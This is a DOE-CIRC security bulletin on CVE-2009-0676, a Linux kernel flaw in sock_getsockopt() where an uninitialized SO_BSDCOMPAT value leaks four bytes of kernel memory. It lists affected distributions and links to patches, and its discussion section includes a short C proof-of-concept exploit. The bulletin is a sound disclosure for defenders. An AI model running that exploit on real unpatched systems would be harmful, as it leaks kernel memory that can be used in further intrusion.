Privacy and Legal Notice

DOE-CIRC TECHNICAL BULLETIN

T-145: Linux Kernel 'sock.c' SO_BSDCOMPAT Option Information Disclosure Vulnerability

[CVE-2009-0676]

May 28, 2009 14:00 GMT
PROBLEM: The Linux Kernel is prone to an information-disclosure vulnerability because it fails to properly initialize certain memory before using using it in a user-accessible operation.
PLATFORM: Ubuntu Linux 8.10 sparc and all previous versions S.u.S.E. SLES 11 DEBUGINFO and all previous versions rPath Linux 2 and all previous versions RedHat Enterprise Linux 5 server and all previous versions MandrakeSoft Linux Mandrake 2009.0 and all previous versions Versions prior to Linux Kernel 2.6.28.8 are vulnerable Debian Linux 5.0 sparc and all previous versions
ABSTRACT: Specifically, the vulnerability resides in the 'sock_getsockopt()' function of the 'net/core/sock.c' source file. The variable 'optval v.val' isn't initialized and four bytes of data may be directly returned to an attacker if the SO_BSDCOMPAT option is set.
LINKS:  
  DOE-CIRC BULLETIN: http://www.doecirc.energy.gov/bulletins/t-145.shtml
  OTHER LINKS: Security Focus
http://www.securityfocus.com/bid/33846/info
Juniper
http://www.juniper.net/security/auto/vulnerabilities/vuln33846.html
CVE: CVE-2009-0676 
[***** Start CVE-2009-0676 *****]

Discussion:
The Linux Kernel is prone to an information-disclosure vulnerability because it fails to properly initialize certain memory
before using it in a user-accessible operation. Specifically, the vulnerability resides in the 'sock_getsockopt()' function
of the 'net/core/sock.c' source file. The variable 'optval v.val' isn't initialized and four bytes of data may be directly
returned to an attacker if the SO_BSDCOMPAT option is set.
Successful exploits will allow attackers to view portions of kernel memory. Information harvested may be used in further
attacks.

The following exploit code is sufficient to demonstrate this issue:

int main(void)
    {
    	unsigned char buf[4] = { 0, 0, 0, 0 };
    	int len;
    	int sock;
    	sock = socket(33, 2, 2);
    	getsockopt(sock, 1, SO_BSDCOMPAT, &buf, &len);
    	printf("%x%x%x%x\n", buf[0], buf[1], buf[2], buf[3]);
    	close(sock);
}

Solution:
Updates are available. Please see the link below for more information.

http://www.securityfocus.com/bid/33846/solution


http://patchwork.kernel.org/patch/6816/


[***** End CVE-2009-0676 *****]
DOECIRC services are available to DOE, DOE Contractors, and the NIH. DOE-CIRC can be contacted at: 
    Voice:          866-941-2472
    E-mail:          doecirc@doecirc.energy.gov
    World Wide Web:  http://www.doecirc.energy.gov
UCRL-MI-119788
IMPACT ASSESSMENT: This risk is medium. Successful exploits will allow attackers to view portions of kernel memory.